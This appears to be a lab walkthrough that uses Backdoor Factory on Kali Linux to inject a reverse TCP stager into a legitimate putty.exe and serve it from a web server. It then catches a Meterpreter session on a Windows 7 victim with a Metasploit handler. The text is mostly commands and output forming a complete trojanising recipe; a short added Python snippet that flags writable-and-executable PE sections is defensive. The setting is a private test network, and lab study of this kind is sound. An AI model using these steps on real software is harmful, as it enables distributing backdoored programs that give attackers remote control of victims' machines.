- Systems used
Kali Linux
Windows 7
- Get the latest version of Backdoor Factory.
# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
[Note] # apt-get -y install the-backdoor-factory
Installing Backdoor Factory through Kali's built-in package update does not work well (bug).
- Download a legitimate program to build the malicious file from.
The program used in this lab is putty.exe.
The file downloaded from www.putty.org does not show up in the cave list, so download and use an older version.
Drag-and-drop often fails in this lab, so upload the file to another Kali shared folder and send it from there.
[Note] Kali shared folder: http://5log.tistory.com/119
# ls putty.exe
putty.exe

# file putty.exe
putty.exe: PE32 executable (GUI) Intel 80386, for MS Windows

> This shows it is a PE32 Windows executable.
# git clone https://github.com/secretsquirrel/the-backdoor-factory.git

Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.4.2

Usage: backdoor.py [options]

Options:
  -h, --help
        show this help message and exit
  -f FILE, --file=FILE
        File to backdoor
  -s SHELL, --shell=SHELL
        Payloads that are available for use. Use 'show' to see payloads.
  -H HOST, --hostip=HOST
        IP of the C2 for reverse connections.
  -P PORT, --port=PORT
        The port to either connect back to for reverse shells or to listen on for bind shells
  -J, --cave_jumping
        Select this options if you want to use code cave jumping to further hide your shellcode in the binary.
  -a, --add_new_section
        Mandating that a new section be added to the exe (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
        User supplied shellcode, make sure that it matches the architecture that you are targeting.
  -c, --cave
        The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size.The -l flag can be use with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
        For use with -c to help find code caves of different sizes
  -o OUTPUT, --output-file=OUTPUT
        The backdoor output file
  -n NSECTION, --section=NSECTION
        New section name must be less than seven characters
  -d DIR, --directory=DIR
        This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the -a setting.
  -w, --change_access
        This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail.
  -i, --injector
        This command turns the backdoor factory in a hunt and shellcode inject type of mechanism. Edit the target settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
        For use with injector, places a suffix on the original file for easy recovery
  -D, --delete_original
        For use with injector module. This command deletes the original file. Not for use in production systems. *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
        Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset.
  -S, --support_check
        To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted.
  -M, --cave-miner
        Future use, to help determine smallest shellcode possible in a PE file
  -q, --no_banner
        Kills the banner.
  -v, --verbose
        For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert
        Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes.
  -R, --runas_admin
        EXPERIMENTAL Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. If not in Support Check mode it will attmept to patch highestAvailable into the manifest if requestedExecutionLevel entry exists.
  -L, --patch_dll
        Use this setting if you DON'T want to patch DLLs. Patches by default.
  -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY
        For MACH-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use -F x86, to force both archs use -F ALL.
  -B BEACON, --beacon=BEACON
        For payloads that have the ability to beacon out, set the time in secs
  -m PATCH_METHOD, --patch-method=PATCH_METHOD
        Patching methods for PE files, 'manual','automatic', replace and onionduke
  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
        For onionduke. Provide your desired binary.
  -X, --xp_mode
        Default: DO NOT support for XP legacy machines, use -X to support XP. By default the binary will crash on XP machines (e.g. sandboxes)
  -A, --idt_in_cave
        EXPERIMENTAL By default a new Import Directory Table is created in a new section, by calling this flag it will be put in a code cave. This can cause bianry failure is some cases. Test on target binaries first.
  -C, --code_sign
        For those with codesigning certs wishing to sign PE binaries only. Name your signing key and private key signingcert.cer and signingPrivateKey.pem repectively in the certs directory it's up to you to obtain signing certs.
  -p, --preprocess
        To execute preprocessing scripts in the preprocess directory
# ./backdoor.py -f /test/putty.exe -s show

Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.4.2

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
   cave_miner_inline
   iat_reverse_tcp_inline
   iat_reverse_tcp_inline_threaded
   iat_reverse_tcp_stager_threaded
   iat_user_supplied_shellcode_threaded
   meterpreter_reverse_https_threaded
   reverse_shell_tcp_inline
   reverse_tcp_stager_threaded
   user_supplied_shellcode_threaded
# ./backdoor.py -f /test/putty.exe -H 192.168.27.50 \
-P 8080 -s iat_reverse_tcp_stager_threaded

Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.4.2

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 409
[*] All caves lengths: 409
############################################################
The following caves can be used to inject code and possibly continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 409
[*] Available caves:
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x29c End: 0xffc; Cave Size: 3424
2. Section Name: .rdata; Section Begin: 0x5d000 End: 0x7b000; Cave begin: 0x7a47c End: 0x7b000; Cave Size: 2948
3. Section Name: .data; Section Begin: 0x7b000 End: 0x7d000; Cave begin: 0x7b9e5 End: 0x7bc0c; Cave Size: 551
4. Section Name: None; Section Begin: None End: None; Cave begin: 0x7c400 End: 0x7d00a; Cave Size: 3082
**************************************************
[!] Enter your selection: 2
[!] Using selection: 2
[*] Changing flags for section: .rdata
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File putty.exe is in the 'backdoored' directory

> A file should be produced for every selection from 1 to 4, but on checking only 2 and 3 work; 1 and 4 do not (error).
# cd backdoored
# ls
putty.exe

# md5sum /test/putty.exe
ba78410702f0cc8453da1afbb2a8b670  /test/putty.exe

# md5sum /test/the-backdoor-factory/backdoored/putty.exe
9cef6b24903632c3a9f2aba6af14a4db  /test/the-backdoor-factory/backdoored/putty.exe

> The md5 values differ.

# ls -l /test/putty.exe /test/the-backdoor-factory/backdoored/putty.exe
-rwxr--r-- 1 root root 531368 11월 11 20:44 /test/putty.exe
-rwxr--r-- 1 root root 524288 11월 11 20:48 /test/the-backdoor-factory/backdoored/putty.exe

> The names are the same, but they are clearly different files.
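A hash mismatch only tells you the file changed; the output above also shows why it changed ("Changing flags for section: .rdata", the effect of BDF's -w option). The added example below, written for this post and not part of Backdoor Factory or the original text, parses a PE section table with only the standard library and reports sections that are both writable and executable, which is the state BDF leaves the cave's section in. The PE headers it inspects are constructed in-line as samples so it runs offline; on a real file, pass open(path, "rb").read() to suspicious_sections().

```python
import struct

# PE section characteristic bits (PE/COFF spec): code, initialized data, execute, read, write.
CODE, IDATA, EXEC, READ, WRITE = 0x20, 0x40, 0x20000000, 0x40000000, 0x80000000


def parse_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table; return [(name, characteristics)]."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_hdr_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_hdr_size  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40  # each IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return sections


def suspicious_sections(data):
    """Names of sections that are writable AND executable (RWE); a normal .rdata/.data never is."""
    return [name for name, chars in parse_sections(data)
            if chars & WRITE and chars & EXEC]


def build_sample_pe(section_flags):
    """Constructed sample: minimal, non-runnable PE32 header with {name: characteristics}."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_flags), 0, 0, 0, 0xE0, 0x102)
    secs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 * (i + 1), 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(section_flags.items()))
    return bytes(dos) + b"PE\0\0" + coff + bytes(0xE0) + secs  # 0xE0 = zeroed PE32 optional header


# Typical layout before patching, and the same layout after a BDF-style patch that
# turned .rdata (cave selection 2 above) into RWE.
CLEAN = build_sample_pe({".text": CODE | READ | EXEC, ".rdata": IDATA | READ,
                         ".data": IDATA | READ | WRITE})
PATCHED = build_sample_pe({".text": CODE | READ | EXEC, ".rdata": IDATA | READ | WRITE | EXEC,
                           ".data": IDATA | READ | WRITE})
```

suspicious_sections(CLEAN) returns an empty list, while suspicious_sections(PATCHED) returns ['.rdata'], the same section the tool reported changing.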
# cp putty.exe /var/www/html
> Put it on the web server so that it can be downloaded from Windows 7.
# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.27.50
LHOST => 192.168.27.50
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.27.50:8080
[*] Starting the payload handler...

> Kali now waits in the listening state.
(Windows 7)
Browse to http://192.168.27.50/putty.exe and download the file.
[Note] If the download does not work:
(Kali)
# service apache2 restart
Run the downloaded putty.
> It runs without any visible problem.
> Try connecting to 192.168.27.50.
> It works just like an ordinary putty program.
[Note] If root login to Kali over SSH does not work:
# vi /etc/ssh/sshd_config
Search for PermitRootLogin (/PermitRootLogin in vi) and change it to yes.
(Kali)
[*] Sending stage (957487 bytes) to 192.168.27.202
[*] Meterpreter session 2 opened (192.168.27.50:8080 -> 192.168.27.202:49297) at 2017-11-11 21:09:57 +0900
meterpreter > sysinfo
Computer        : ADMINSTRATOR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.27.202 - Meterpreter session 2 closed.  Reason: User exit

> The connection is confirmed.
> Run a simple sysinfo command, then close the connection.
> When the connection is closed from Kali, putty also exits on Windows 7.
> Likewise, closing putty on Windows 7 drops the connection on Kali.